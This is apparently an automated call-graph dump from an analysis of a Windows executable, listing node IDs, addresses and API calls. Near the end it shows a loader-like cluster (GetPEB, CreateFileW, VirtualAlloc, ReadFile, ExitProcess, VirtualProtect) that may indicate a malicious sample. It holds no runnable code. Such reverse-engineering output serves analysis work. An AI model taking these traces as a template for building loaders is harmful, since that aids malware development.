87502->87495 87503 41de10 GetLastError 87502->87503 87503->87480 87504 41dda3 87511 41dd60 87504->87511 87512 41ddda 87504->87512 87505 41dd96 87507 417f77 __fptostr 46 API calls 87505->87507 87506->87495 87506->87504 87506->87505 87506->87511 87507->87495 87508->87496 87513 420494 __lseeki64_nolock 48 API calls 87508->87513 87509->87499 87510 420494 __lseeki64_nolock 48 API calls 87509->87510 87510->87509 87511->87502 87514 420494 __lseeki64_nolock 48 API calls 87512->87514 87513->87508 87515 41dde9 87514->87515 87515->87502 87516->87400 87517->87416 87518->87401 87519->87407 87520->87416 87521->87411 87522->87407 87523->87420 87524->87419 87525->87416 87527 416b04 __malloc_crt 46 API calls 87526->87527 87528 420618 87527->87528 87528->87429 87529->87426 87530->87434 87534 4148b3 GetSystemTimeAsFileTime __aulldiv 87531->87534 87533 442c6b 87533->87037 87534->87533 87535->87044 87536->87050 87537->87050 87543 45272f __tzset_nolock _wcscpy 87538->87543 87539 414d04 61 API calls __fread_nolock 87539->87543 87540 44afef GetSystemTimeAsFileTime 87540->87543 87541 4528a4 87541->86959 87541->86960 87542 4150d1 81 API calls _fseek 87542->87543 87543->87539 87543->87540 87543->87541 87543->87542 87545 44b1bc 87544->87545 87546 44b1ca 87544->87546 87547 4149c2 116 API calls 87545->87547 87548 44b1e1 87546->87548 87549 4149c2 116 API calls 87546->87549 87550 44b1d8 87546->87550 87547->87546 87579 4321a4 87548->87579 87551 44b2db 87549->87551 87550->86988 87551->87548 87556 44b2e9 87551->87556 87553 44b224 87554 44b253 87553->87554 87555 44b228 87553->87555 87583 43213d 87554->87583 87558 44b235 87555->87558 87561 414a46 __fcloseall 82 API calls 87555->87561 87557 44b2f6 87556->87557 87559 414a46 __fcloseall 82 API calls 87556->87559 87557->86988 87562 44b245 87558->87562 87564 414a46 __fcloseall 82 API calls 87558->87564 87559->87557 87561->87558 87562->86988 87563 44b25a 87565 44b260 87563->87565 87566 44b289 87563->87566 87564->87562 87568 44b26d 87565->87568 87571 414a46 __fcloseall 82 API calls 87565->87571 87593 44b0bf 87 API calls 87566->87593 87569 44b27d 87568->87569 87572 414a46 __fcloseall 82 API calls 87568->87572 87569->86988 87570 44b28f 87594 4320f8 46 API calls _free 87570->87594 87571->87568 87572->87569 87574 44b295 87575 44b2a2 87574->87575 87576 414a46 __fcloseall 82 API calls 87574->87576 87577 44b2b2 87575->87577 87578 414a46 __fcloseall 82 API calls 87575->87578 87576->87575 87577->86988 87578->87577 87580 4321cb 87579->87580 87582 4321b4 __tzset_nolock _memmove 87579->87582 87581 414d04 __fread_nolock 61 API calls 87580->87581 87581->87582 87582->87553 87584 4135bb _malloc 46 API calls 87583->87584 87585 432150 87584->87585 87586 4135bb _malloc 46 API calls 87585->87586 87587 432162 87586->87587 87588 4135bb _malloc 46 API calls 87587->87588 87590 432174 87588->87590 87592 432189 87590->87592 87595 4320f8 46 API calls _free 87590->87595 87591 432198 87591->87563 87592->87563 87593->87570 87594->87574 87595->87591 87596->86890 87597->86891 87598->86910 87599->86910 87600->86910 87601->86904 87602->86910 87603->86910 87604->86914 87605->86923 87606->86925 87607->86925 87657 410160 87608->87657 87610 41012f GetFullPathNameW 87611 410147 moneypunct 87610->87611 87611->86744 87613 4102cb SHGetDesktopFolder 87612->87613 87614 410333 _wcsncpy 87612->87614 87613->87614 87615 4102e0 _wcsncpy 87613->87615 87614->86747 87615->87614 87616 41031c SHGetPathFromIDListW 87615->87616 87616->87614 87618 4101bb 87617->87618 87624 425f4a 87617->87624 87619 410160 52 API calls 87618->87619 87621 4101c7 87619->87621 87620 4114ab __wcsicoll 58 API calls 87620->87624 87661 410200 52 API calls 2 library calls 87621->87661 87623 4101d6 87662 410200 52 API calls 2 library calls 87623->87662 87624->87620 87626 425f6e 87624->87626 87626->86749 87627 4101e9 87627->86749 87629 40f760 128 API calls 87628->87629 87630 40f584 87629->87630 87631 429335 87630->87631 87632 40f58c 87630->87632 87633 4528bd 118 API calls 87631->87633 87634 40f598 87632->87634 87635 429358 87632->87635 87636 42934b 87633->87636 87687 4033c0 113 API calls 7 library calls 87634->87687 87688 434034 86 API calls _wprintf 87635->87688 87639 429373 87636->87639 87640 42934f 87636->87640 87644 4115d7 52 API calls 87639->87644 87643 431e58 82 API calls 87640->87643 87641 429369 87641->87639 87642 40f5b4 87642->86745 87643->87635 87656 4293c5 moneypunct 87644->87656 87645 42959c 87646 413748 _free 46 API calls 87645->87646 87647 4295a5 87646->87647 87648 431e58 82 API calls 87647->87648 87649 4295b1 87648->87649 87653 401b10 52 API calls 87653->87656 87656->87645 87656->87653 87663 444af8 87656->87663 87666 44b41c 87656->87666 87673 402780 87656->87673 87681 4022d0 87656->87681 87689 44c7dd 64 API calls 3 library calls 87656->87689 87658 410167 _wcslen 87657->87658 87659 4115d7 52 API calls 87658->87659 87660 41017e _wcscpy 87659->87660 87660->87610 87661->87623 87662->87627 87664 4115d7 52 API calls 87663->87664 87665 444b27 _memmove 87664->87665 87665->87656 87667 44b429 87666->87667 87668 4115d7 52 API calls 87667->87668 87669 44b440 87668->87669 87670 44b45e 87669->87670 87671 401b10 52 API calls 87669->87671 87670->87656 87672 44b453 87671->87672 87672->87656 87674 402827 87673->87674 87677 402790 moneypunct _memmove 87673->87677 87676 4115d7 52 API calls 87674->87676 87675 4115d7 52 API calls 87678 402797 87675->87678 87676->87677 87677->87675 87679 4027bd 87678->87679 87680 4115d7 52 API calls 87678->87680 87679->87656 87680->87679 87682 4022e0 87681->87682 87684 40239d 87681->87684 87683 4115d7 52 API calls 87682->87683 87682->87684 87685 402320 moneypunct 87682->87685 87683->87685 87684->87656 87685->87684 87686 4115d7 52 API calls 87685->87686 87686->87685 87687->87642 87688->87641 87689->87656 87691 402539 moneypunct 87690->87691 87692 402417 87690->87692 87691->86753 87692->87691 87693 4115d7 52 API calls 87692->87693 87694 402443 87693->87694 87695 4115d7 52 API calls 87694->87695 87696 4024b4 87695->87696 87696->87691 87698 4022d0 52 API calls 87696->87698 87719 402880 87696->87719 87698->87696 87704 401566 87699->87704 87700 401794 87771 40e9a0 90 API calls 87700->87771 87703 4010a0 52 API calls 87703->87704 87704->87700 87704->87703 87705 40167a 87704->87705 87706 4017c0 87705->87706 87772 45e737 90 API calls 3 library calls 87705->87772 87706->86755 87708 40bc70 52 API calls 87707->87708 87709 40d451 87708->87709 87710 40d50f 87709->87710 87712 40d519 87709->87712 87713 40e0a0 52 API calls 87709->87713 87715 401b10 52 API calls 87709->87715 87717 427c01 87709->87717 87773 40f310 53 API calls 87709->87773 87774 40d860 91 API calls 87709->87774 87775 410600 52 API calls 87710->87775 87712->86758 87713->87709 87715->87709 87776 45e737 90 API calls 3 library calls 87717->87776 87720 4115d7 52 API calls 87719->87720 87721 4028b3 87720->87721 87722 4115d7 52 API calls 87721->87722 87742 4028c5 moneypunct _memmove 87722->87742 87723 402780 52 API calls 87724 402b1e moneypunct 87723->87724 87724->87696 87725 427d62 87727 403350 52 API calls 87725->87727 87737 427d6b 87727->87737 87728 402bb6 87762 403060 53 API calls 87728->87762 87729 402aeb moneypunct 87729->87723 87735 42802b moneypunct 87729->87735 87731 402bca 87732 427f63 87731->87732 87733 402bd4 87731->87733 87768 460879 92 API calls 3 library calls 87732->87768 87736 402780 52 API calls 87733->87736 87734 403350 52 API calls 87734->87742 87740 402bdf 87736->87740 87760 427f2c 87737->87760 87765 403020 52 API calls _memmove 87737->87765 87740->87696 87742->87725 87742->87728 87742->87729 87742->87734 87743 427fd5 87742->87743 87744 402780 52 API calls 87742->87744 87747 402f00 52 API calls 87742->87747 87750 427fa5 87742->87750 87752 428000 87742->87752 87754 4026f0 52 API calls 87742->87754 87759 4115d7 52 API calls 87742->87759 87742->87760 87761 4031b0 63 API calls 87742->87761 87763 402f80 92 API calls _memmove 87742->87763 87764 402280 52 API calls 87742->87764 87766 4013a0 52 API calls 87742->87766 87769 460879 92 API calls 3 library calls 87743->87769 87744->87742 87747->87742 87749 427fe4 87755 402780 52 API calls 87749->87755 87756 402780 52 API calls 87750->87756 87751 427f48 87751->87724 87770 460879 92 API calls 3 library calls 87752->87770 87758 402a85 CharUpperBuffW 87754->87758 87755->87751 87756->87724 87758->87742 87759->87742 87767 460879 92 API calls 3 library calls 87760->87767 87761->87742 87762->87731 87763->87742 87764->87742 87765->87737 87766->87742 87767->87751 87768->87751 87769->87749 87770->87724 87771->87705 87772->87706 87773->87709 87774->87709 87775->87712 87776->87712 87777->86772 87778->86771 87780 42c5fe 87779->87780 87794 4091c6 87779->87794 87781 40bc70 52 API calls 87780->87781 87780->87794 87782 42c64e InterlockedIncrement 87781->87782 87783 42c665 87782->87783 87788 42c697 87782->87788 87785 42c672 InterlockedDecrement Sleep InterlockedIncrement 87783->87785 87783->87788 87784 42c737 InterlockedDecrement 87786 42c74a 87784->87786 87785->87783 87785->87788 87789 408f40 VariantClear 87786->87789 87787 42c731 87787->87784 87788->87784 87788->87787 87937 408e80 87788->87937 87791 42c752 87789->87791 87950 410c60 VariantClear moneypunct 87791->87950 87794->86834 87796 42c6db 87797 402160 52 API calls 87796->87797 87798 42c6e5 87797->87798 87799 45340c 85 API calls 87798->87799 87800 42c6f1 87799->87800 87947 40d200 52 API calls 2 library calls 87800->87947 87802 42c6fb 87948 465124 53 API calls 87802->87948 87804 42c715 87805 42c76a 87804->87805 87806 42c719 87804->87806 87807 401b10 52 API calls 87805->87807 87949 46fe32 VariantClear 87806->87949 87809 42c77e 87807->87809 87810 401980 53 API calls 87809->87810 87816 42c796 87810->87816 87811 42c812 87952 46fe32 VariantClear 87811->87952 87813 42c82a InterlockedDecrement 87953 46ff07 54 API calls 87813->87953 87815 42c864 87954 45e737 90 API calls 3 library calls 87815->87954 87816->87811 87816->87815 87951 40ba10 52 API calls 2 library calls 87816->87951 87819 42c9ec 87997 47d33e 338 API calls 87819->87997 87821 42c9fe 87998 46feb1 VariantClear VariantClear 87821->87998 87823 42ca08 87827 401b10 52 API calls 87823->87827 87824 42c874 87828 408f40 VariantClear 87824->87828 87836 42ca59 87824->87836 87825 408f40 VariantClear 87826 42c849 87825->87826 87826->87819 87826->87825 87829 402780 52 API calls 87826->87829 87834 401980 53 API calls 87826->87834 87956 40a780 87826->87956 87830 42ca15 87827->87830 87831 42c891 87828->87831 87829->87826 87832 40c2c0 52 API calls 87830->87832 87955 410c60 VariantClear moneypunct 87831->87955 87832->87824 87834->87826 87836->87836 87838 40afc4 87837->87838 87839 40b156 87837->87839 87840 40afd5 87838->87840 87841 42d1e3 87838->87841 88009 45e737 90 API calls 3 library calls 87839->88009 87846 40a780 201 API calls 87840->87846 87857 40b11a moneypunct 87840->87857 88010 45e737 90 API calls 3 library calls 87841->88010 87844 40b143 87844->86834 87845 42d1f8 87850 408f40 VariantClear 87845->87850 87848 40b00a 87846->87848 87848->87845 87851 40b012 87848->87851 87849 42d4db 87849->87849 87850->87844 87852 42d231 VariantClear 87851->87852 87854 40b04a 87851->87854 87861 40b094 moneypunct 87851->87861 87862 40b05c moneypunct 87852->87862 87853 40b108 87853->87857 88012 40e270 VariantClear moneypunct 87853->88012 87854->87862 88011 40e270 VariantClear moneypunct 87854->88011 87855 42d45a VariantClear 87855->87857 87857->87844 88013 45e737 90 API calls 3 library calls 87857->88013 87858 4115d7 52 API calls 87858->87861 87860 42d425 moneypunct 87860->87855 87860->87857 87861->87853 87861->87860 87862->87858 87862->87861 87864 408fff 87863->87864 87866 40900d 87863->87866 88014 403ea0 52 API calls __cinit 87864->88014 87868 42c3f6 87866->87868 87870 42c44a 87866->87870 87871 40a780 201 API calls 87866->87871 87872 42c47b 87866->87872 87875 42c564 87866->87875 87877 42c4cb 87866->87877 87878 42c548 87866->87878 87883 409112 87866->87883 87885 4090df 87866->87885 87887 42c528 87866->87887 87889 4090ea 87866->87889 87897 4090f2 moneypunct 87866->87897 88016 4534e3 52 API calls 87866->88016 88018 40c4e0 201 API calls 87866->88018 88017 45e737 90 API calls 3 library calls 87868->88017 88019 45e737 90 API calls 3 library calls 87870->88019 87871->87866 88020 451b42 61 API calls 87872->88020 87879 408f40 VariantClear 87875->87879 88022 47faae 240 API calls 87877->88022 88025 45e737 90 API calls 3 library calls 87878->88025 87879->87897 87880 42c491 87880->87897 88021 45e737 90 API calls 3 library calls 87880->88021 87882 42c4da 87882->87897 88023 45e737 90 API calls 3 library calls 87882->88023 87883->87878 87892 40912b 87883->87892 87885->87889 87890 408e80 VariantClear 87885->87890 88024 45e737 90 API calls 3 library calls 87887->88024 87893 408f40 VariantClear 87889->87893 87890->87889 87892->87897 88015 403e10 53 API calls 87892->88015 87893->87897 87895 40914b 87896 408f40 VariantClear 87895->87896 87896->87897 87897->86834 88026 408d90 87898->88026 87900 408cf9 87901 429778 87900->87901 87904 42976c 87900->87904 87906 408d2d 87900->87906 88056 410c60 VariantClear moneypunct 87901->88056 87903 429780 88055 45e737 90 API calls 3 library calls 87904->88055 88043 403d10 87906->88043 87909 408d71 moneypunct 87909->86834 87910 408f40 VariantClear 87911 408d45 moneypunct 87910->87911 87911->87909 87911->87910 87912->86834 87913->86834 87914->86834 87915->86834 87916->86782 87917->86787 87918->86834 87919->86834 87920->86834 87921->86834 87922->86839 87923->86839 87924->86839 87925->86839 87926->86839 87927->86839 87928->86839 87930 403cdf 87929->87930 87931 408f40 VariantClear 87930->87931 87932 403ce7 87931->87932 87932->86827 87933->86839 87934->86839 87935->86834 87936->86779 87938 408e88 87937->87938 87940 408e94 87937->87940 87939 408f40 VariantClear 87938->87939 87939->87940 87941 45340c 87940->87941 87942 453439 87941->87942 87943 453419 87941->87943 87942->87796 87944 45342f 87943->87944 87999 4531b1 85 API calls 5 library calls 87943->87999 87944->87796 87946 453425 87946->87796 87947->87802 87948->87804 87949->87787 87950->87794 87951->87816 87952->87813 87953->87826 87954->87824 87955->87794 87957 40a7a6 87956->87957 87958 40ae8c 87956->87958 87960 4115d7 52 API calls 87957->87960 88000 41130a 51 API calls __cinit 87958->88000 87995 40a7c6 moneypunct _memmove 87960->87995 87961 40a86d 87962 40abd1 87961->87962 87981 40a878 moneypunct 87961->87981 88005 45e737 90 API calls 3 library calls 87962->88005 87963 401b10 52 API calls 87963->87995 87965 40bc10 53 API calls 87965->87995 87966 42b791 VariantClear 87966->87995 87967 40b5f0 89 API calls 87967->87995 87968 408e80 VariantClear 87968->87995 87969 42ba2d VariantClear 87969->87995 87970 408f40 VariantClear 87970->87981 87971 42b459 VariantClear 87971->87995 87972 40a884 moneypunct 87972->87826 87973 408cc0 194 API calls 87973->87995 87975 42b6f6 VariantClear 87975->87995 87976 4530c9 VariantClear 87976->87995 87977 42bc5b 87977->87826 87978 42bbf5 88006 45e737 90 API calls 3 library calls 87978->88006 87979 4115d7 52 API calls 87979->87995 87980 42bb6a 88008 44b92d VariantClear 87980->88008 87981->87970 87981->87972 87982 40e270 VariantClear 87982->87995 87984 4115d7 52 API calls 87987 42b5b3 VariantInit VariantCopy 87984->87987 87986 408f40 VariantClear 87986->87995 87989 42b5d7 VariantClear 87987->87989 87987->87995 87989->87995 87991 42bc37 88007 45e737 90 API calls 3 library calls 87991->88007 87994 42bc48 87994->87980 87996 408f40 VariantClear 87994->87996 87995->87961 87995->87962 87995->87963 87995->87965 87995->87966 87995->87967 87995->87968 87995->87969 87995->87971 87995->87973 87995->87975 87995->87976 87995->87978 87995->87979 87995->87980 87995->87982 87995->87984 87995->87986 87995->87991 88001 45308a 53 API calls 87995->88001 88002 470870 52 API calls 87995->88002 88003 457f66 87 API calls __write_nolock 87995->88003 88004 472f47 127 API calls 87995->88004 87996->87980 87997->87821 87998->87823 87999->87946 88000->87995 88001->87995 88002->87995 88003->87995 88004->87995 88005->87980 88006->87980 88007->87994 88008->87977 88009->87841 88010->87845 88011->87862 88012->87857 88013->87849 88014->87866 88015->87895 88016->87866 88017->87897 88018->87866 88019->87897 88020->87880 88021->87897 88022->87882 88023->87897 88024->87897 88025->87875 88027 4289d2 88026->88027 88028 408db3 88026->88028 88059 45e737 90 API calls 3 library calls 88027->88059 88057 40bec0 90 API calls 88028->88057 88031 4289e5 88060 45e737 90 API calls 3 library calls 88031->88060 88032 408dc9 88032->88031 88034 428a05 88032->88034 88037 40a780 201 API calls 88032->88037 88038 408e6c 88032->88038 88039 408e64 88032->88039 88041 408f40 VariantClear 88032->88041 88042 408e5a 88032->88042 88058 40ba10 52 API calls 2 library calls 88032->88058 88036 408f40 VariantClear 88034->88036 88036->88038 88037->88032 88038->87900 88040 408f40 VariantClear 88039->88040 88040->88038 88041->88032 88042->87900 88044 408f40 VariantClear 88043->88044 88045 403d20 88044->88045 88046 403cd0 VariantClear 88045->88046 88047 403d4d 88046->88047 88061 467897 88047->88061 88105 46e91c 88047->88105 88108 45e17d 88047->88108 88118 4813fa 88047->88118 88128 40de10 88047->88128 88133 4755ad 88047->88133 88048 403d76 88048->87901 88048->87911 88055->87901 88056->87903 88057->88032 88058->88032 88059->88031 88060->88034 88062 4678bb 88061->88062 88064 45340c 85 API calls 88062->88064 88090 467954 88062->88090 88063 4115d7 52 API calls 88065 467989 88063->88065 88066 4678f6 88064->88066 88067 467995 88065->88067 88155 40da60 53 API calls 88065->88155 88068 413a0e __wsplitpath 46 API calls 88066->88068 88136 4533eb 88067->88136 88071 4678fc 88068->88071 88073 401b10 52 API calls 88071->88073 88075 46790c 88073->88075 88152 40d200 52 API calls 2 library calls 88075->88152 88078 4679c7 GetLastError 88081 403cd0 VariantClear 88078->88081 88079 467a05 88082 467a2c 88079->88082 88083 467a4b 88079->88083 88080 467917 88080->88090 88153 4339fa GetFileAttributesW FindFirstFileW FindClose 88080->88153 88084 4679dc 88081->88084 88086 4115d7 52 API calls 88082->88086 88087 4115d7 52 API calls 88083->88087 88088 4679e6 88084->88088 88156 44ae3e 88084->88156 88092 467a31 88086->88092 88093 467a49 88087->88093 88096 408f40 VariantClear 88088->88096 88089 467928 88089->88090 88095 46792f 88089->88095 88090->88063 88091 467964 88090->88091 88091->88048 88159 436299 52 API calls 2 library calls 88092->88159 88100 408f40 VariantClear 88093->88100 88154 4335cd 56 API calls 3 library calls 88095->88154 88099 4679ed 88096->88099 88099->88048 88102 467a88 88100->88102 88101 467939 88101->88090 88103 408f40 VariantClear 88101->88103 88102->88048 88104 467947 88103->88104 88104->88090 88183 46e785 88105->88183 88107 46e92f 88107->88048 88109 45e198 88108->88109 88110 45e19c 88109->88110 88111 45e1b8 88109->88111 88112 408f40 VariantClear 88110->88112 88113 45e1cc 88111->88113 88114 45e1db FindClose 88111->88114 88115 45e1a4 88112->88115 88116 44ae3e CloseHandle 88113->88116 88117 45e1d9 moneypunct 88113->88117 88114->88117 88115->88048 88116->88117 88117->88048 88119 45340c 85 API calls 88118->88119 88120 481438 88119->88120 88121 402880 95 API calls 88120->88121 88122 48143f 88121->88122 88123 481465 88122->88123 88124 40a780 201 API calls 88122->88124 88126 481469 88123->88126 88244 40e710 53 API calls 88123->88244 88124->88123 88126->88048 88127 4814a4 88127->88048 88129 4115d7 52 API calls 88128->88129 88130 40de23 88129->88130 88131 40da20 CloseHandle 88130->88131 88132 40de2e 88131->88132 88132->88048 88245 475077 88133->88245 88135 4755c0 88135->88048 88137 453404 88136->88137 88138 4533f8 88136->88138 88140 40de40 88137->88140 88138->88137 88160 4531b1 85 API calls 5 library calls 88138->88160 88161 40da20 88140->88161 88142 40de4e 88165 40f110 88142->88165 88145 4264fa 88147 40de84 88174 40e080 SetFilePointerEx SetFilePointerEx 88147->88174 88149 40de8b 88175 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88149->88175 88151 40de90 88151->88078 88151->88079 88152->88080 88153->88089 88154->88101 88155->88067 88158 44ae4b moneypunct 88156->88158 88177 443fdf 88156->88177 88158->88088 88159->88093 88160->88137 88162 40da37 88161->88162 88163 40da29 88161->88163 88162->88163 88164 40da3c CloseHandle 88162->88164 88163->88142 88164->88142 88166 40f125 CreateFileW 88165->88166 88167 42630c 88165->88167 88169 40de74 88166->88169 88168 426311 CreateFileW 88167->88168 88167->88169 88168->88169 88170 426337 88168->88170 88169->88145 88173 40dea0 55 API calls moneypunct 88169->88173 88176 40df90 SetFilePointerEx SetFilePointerEx 88170->88176 88172 426342 88172->88169 88173->88147 88174->88149 88175->88151 88176->88172 88178 40da20 CloseHandle 88177->88178 88179 443feb 88178->88179 88182 4340db CloseHandle moneypunct 88179->88182 88181 444001 88181->88158 88182->88181 88184 46e7a2 88183->88184 88185 4115d7 52 API calls 88184->88185 88187 46e802 88184->88187 88186 46e7ad 88185->88186 88189 46e7b9 88186->88189 88231 40da60 53 API calls 88186->88231 88188 46e7e5 88187->88188 88196 46e82f 88187->88196 88191 408f40 VariantClear 88188->88191 88192 4533eb 85 API calls 88189->88192 88193 46e7ea 88191->88193 88194 46e7ca 88192->88194 88193->88107 88197 40de40 60 API calls 88194->88197 88195 46e8b5 88224 4680ed 88195->88224 88196->88195 88198 46e845 88196->88198 88199 46e7d7 88197->88199 88201 4533eb 85 API calls 88198->88201 88199->88196 88202 46e7db 88199->88202 88212 46e84b 88201->88212 88202->88188 88205 44ae3e CloseHandle 88202->88205 88203 46e8bb 88228 443fbe 88203->88228 88204 46e87a 88232 4689f4 59 API calls 88204->88232 88205->88188 88208 46e883 88233 4013c0 52 API calls 88208->88233 88211 46e88f 88214 40e0a0 52 API calls 88211->88214 88212->88204 88212->88208 88213 408f40 VariantClear 88222 46e881 88213->88222 88215 46e899 88214->88215 88234 40d200 52 API calls 2 library calls 88215->88234 88217 46e911 88217->88107 88218 46e8a5 88235 4689f4 59 API calls 88218->88235 88219 40da20 CloseHandle 88221 46e903 88219->88221 88223 44ae3e CloseHandle 88221->88223 88222->88217 88222->88219 88223->88217 88225 4680fa 88224->88225 88227 468100 88224->88227 88236 467ac4 55 API calls 2 library calls 88225->88236 88227->88203 88237 443e36 88228->88237 88230 443fd3 88230->88213 88230->88222 88231->88189 88232->88222 88233->88211 88234->88218 88235->88222 88236->88227 88240 443e19 88237->88240 88241 443e26 88240->88241 88242 443e32 WriteFile 88240->88242 88243 443db4 SetFilePointerEx SetFilePointerEx 88241->88243 88242->88230 88243->88242 88244->88127 88246 4533eb 85 API calls 88245->88246 88247 4750b8 88246->88247 88248 4750ee 88247->88248 88249 475129 88247->88249 88251 408f40 VariantClear 88248->88251 88298 4646e0 88249->88298 88256 4750f5 88251->88256 88252 47515e 88253 475162 88252->88253 88291 47518e 88252->88291 88254 408f40 VariantClear 88253->88254 88285 475169 88254->88285 88255 475357 88257 475365 88255->88257 88258 4754ea 88255->88258 88256->88135 88332 44b3ac 57 API calls 88257->88332 88338 464812 92 API calls 88258->88338 88262 4754fc 88263 475374 88262->88263 88265 475508 88262->88265 88311 430d31 88263->88311 88264 4533eb 85 API calls 88264->88291 88266 408f40 VariantClear 88265->88266 88269 47550f 88266->88269 88269->88285 88270 475388 88318 4577e9 88270->88318 88272 47539e 88326 410cfc 88272->88326 88273 475480 88275 408f40 VariantClear 88273->88275 88275->88285 88277 4753d4 88334 40e830 53 API calls 88277->88334 88278 4753b8 88333 45e737 90 API calls 3 library calls 88278->88333 88281 4753c5 GetCurrentProcess TerminateProcess 88281->88277 88282 4753e3 88296 475406 88282->88296 88335 40cf00 53 API calls 88282->88335 88283 4754b5 88284 408f40 VariantClear 88283->88284 88284->88285 88285->88135 88287 475556 88287->88285 88292 47556e FreeLibrary 88287->88292 88288 4753f8 88336 46c43e 106 API calls 2 library calls 88288->88336 88291->88255 88291->88264 88291->88273 88291->88283 88291->88291 88330 436299 52 API calls 2 library calls 88291->88330 88331 463ad5 64 API calls __wcsicoll 88291->88331 88292->88285 88294 408e80 VariantClear 88294->88296 88296->88287 88296->88294 88297 408f40 VariantClear 88296->88297 88337 40cf00 53 API calls 88296->88337 88339 44b3ac 57 API calls 88296->88339 88340 46c43e 106 API calls 2 library calls 88296->88340 88297->88296 88341 4536f7 53 API calls 88298->88341 88300 4646fc 88342 4426cd 59 API calls _wcslen 88300->88342 88302 464711 88304 40bc70 52 API calls 88302->88304 88310 46474b 88302->88310 88305 46472c 88304->88305 88343 461465 52 API calls _memmove 88305->88343 88307 464793 88307->88252 88308 464741 88309 40c600 52 API calls 88308->88309 88309->88310 88310->88307 88344 463ad5 64 API calls __wcsicoll 88310->88344 88312 430db2 88311->88312 88313 430d54 88311->88313 88312->88270 88314 4115d7 52 API calls 88313->88314 88315 430d74 88314->88315 88316 430da9 88315->88316 88317 4115d7 52 API calls 88315->88317 88316->88270 88317->88315 88319 457a84 88318->88319 88325 45780c _strcat moneypunct _wcslen _wcscpy 88318->88325 88319->88272 88320 443006 57 API calls 88320->88325 88322 4135bb 46 API calls _malloc 88322->88325 88323 45340c 85 API calls 88323->88325 88324 40f6f0 54 API calls 88324->88325 88325->88319 88325->88320 88325->88322 88325->88323 88325->88324 88345 44b3ac 57 API calls 88325->88345 88327 410d11 88326->88327 88328 410da9 VirtualProtect 88327->88328 88329 410d77 88327->88329 88328->88329 88329->88277 88329->88278 88330->88291 88331->88291 88332->88263 88333->88281 88334->88282 88335->88288 88336->88296 88337->88296 88338->88262 88339->88296 88340->88296 88341->88300 88342->88302 88343->88308 88344->88307 88345->88325 88346 4264410 88360 4262060 88346->88360 88348 42644d2 88363 4264300 88348->88363 88350 42644fb CreateFileW 88352 426454f 88350->88352 88353 426454a 88350->88353 88352->88353 88354 4264566 VirtualAlloc 88352->88354 88354->88353 88355 4264584 ReadFile 88354->88355 88355->88353 88356 426459f 88355->88356 88357 4263300 13 API calls 88356->88357 88358 42645d2 88357->88358 88359 42645f5 ExitProcess 88358->88359 88359->88353 88366 4265500 GetPEB 88360->88366 88362 42626eb 88362->88348 88364 4264309 Sleep 88363->88364 88365 4264317 88364->88365 88367 426552a 88366->88367 88367->88362 88368 42d154 88372 480a8d 88368->88372 88370 42d161 88371 480a8d 201 API calls 88370->88371 88371->88370 88373 480ae4 88372->88373 88374 480b26 88372->88374 88376 480aeb 88373->88376 88377 480b15 88373->88377 88375 40bc70 52 API calls 88374->88375 88386 480b2e 88375->88386 88378 480aee 88376->88378 88379 480b04 88376->88379 88405 4805bf 201 API calls 88377->88405 88378->88374 88381 480af3 88378->88381 88404 47fea2 201 API calls __itow_s 88379->88404 88403 47f135 201 API calls 88381->88403 88383 40e0a0 52 API calls 88383->88386 88385 408f40 VariantClear 88388 481156 88385->88388 88386->88383 88389 480aff 88386->88389 88392 401980 53 API calls 88386->88392 88394 40c2c0 52 API calls 88386->88394 88395 408e80 VariantClear 88386->88395 88396 480ff5 88386->88396 88397 40e710 53 API calls 88386->88397 88398 40a780 201 API calls 88386->88398 88406 45377f 52 API calls 88386->88406 88407 45e951 53 API calls 88386->88407 88408 40e830 53 API calls 88386->88408 88409 47925f 53 API calls 88386->88409 88410 47fcff 201 API calls 88386->88410 88390 408f40 VariantClear 88388->88390 88389->88385 88391 48115e 88390->88391 88391->88370 88392->88386 88394->88386 88395->88386 88411 45e737 90 API calls 3 library calls 88396->88411 88397->88386 88398->88386 88403->88389 88404->88389 88405->88389 88406->88386 88407->88386 88408->88386 88409->88386 88410->88386 88411->88389 88412 425b2b 88417 40f000 88412->88417 88416 425b3a 88418 4115d7 52 API calls 88417->88418 88419 40f007 88418->88419 88420 4276ea 88419->88420 88426 40f030 88419->88426 88425 41130a 51 API calls __cinit 88425->88416 88427 40f039 88426->88427 88428 40f01a 88426->88428 88456 41130a 51 API calls __cinit 88427->88456 88430 40e500 88428->88430 88431 40bc70 52 API calls 88430->88431 88432 40e515 GetVersionExW 88431->88432 88433 402160 52 API calls 88432->88433 88434 40e557 88433->88434 88457 40e660 88434->88457 88439 427674 88444 4276c6 GetSystemInfo 88439->88444 88442 40e5e0 88445 4276d5 GetSystemInfo 88442->88445 88471 40efd0 88442->88471 88443 40e5cd GetCurrentProcess 88478 40ef20 LoadLibraryA GetProcAddress 88443->88478 88444->88445 88449 40e629 88475 40ef90 88449->88475 88452 40e641 FreeLibrary 88453 40e644 88452->88453 88454 40e653 FreeLibrary 88453->88454 88455 40e656 88453->88455 88454->88455 88455->88425 88456->88428 88458 40e667 88457->88458 88459 42761d 88458->88459 88460 40c600 52 API calls 88458->88460 88461 40e55c 88460->88461 88462 40e680 88461->88462 88463 40e687 88462->88463 88464 427616 88463->88464 88465 40c600 52 API calls 88463->88465 88466 40e566 88465->88466 88466->88439 88467 40ef60 88466->88467 88468 40e5c8 88467->88468 88469 40ef66 LoadLibraryA 88467->88469 88468->88442 88468->88443 88469->88468 88470 40ef77 GetProcAddress 88469->88470 88470->88468 88472 40e620 88471->88472 88473 40efd6 LoadLibraryA 88471->88473 88472->88444 88472->88449 88473->88472 88474 40efe7 GetProcAddress 88473->88474 88474->88472 88479 40efb0 LoadLibraryA GetProcAddress 88475->88479 88477 40e632 GetNativeSystemInfo 88477->88452 88477->88453 88478->88442 88479->88477 88480 425b5e 88485 40c7f0 88480->88485 88484 425b6d 88520 40db10 52 API calls 88485->88520 88487 40c82a 88521 410ab0 6 API calls 88487->88521 88489 40c86d 88490 40bc70 52 API calls 88489->88490 88491 40c877 88490->88491 88492 40bc70 52 API calls 88491->88492 88493 40c881 88492->88493 88494 40bc70 52 API calls 88493->88494 88495 40c88b 88494->88495 88496 40bc70 52 API calls 88495->88496 88497 40c8d1 88496->88497 88498 40bc70 52 API calls 88497->88498 88499 40c991 88498->88499 88522 40d2c0 52 API calls 88499->88522 88501 40c99b 88523 40d0d0 53 API calls 88501->88523 88503 40c9c1 88504 40bc70 52 API calls 88503->88504 88505 40c9cb 88504->88505 88524 40e310 53 API calls 88505->88524 88507 40ca28 88508 408f40 VariantClear 88507->88508 88509 40ca30 88508->88509 88510 408f40 VariantClear 88509->88510 88511 40ca38 GetStdHandle 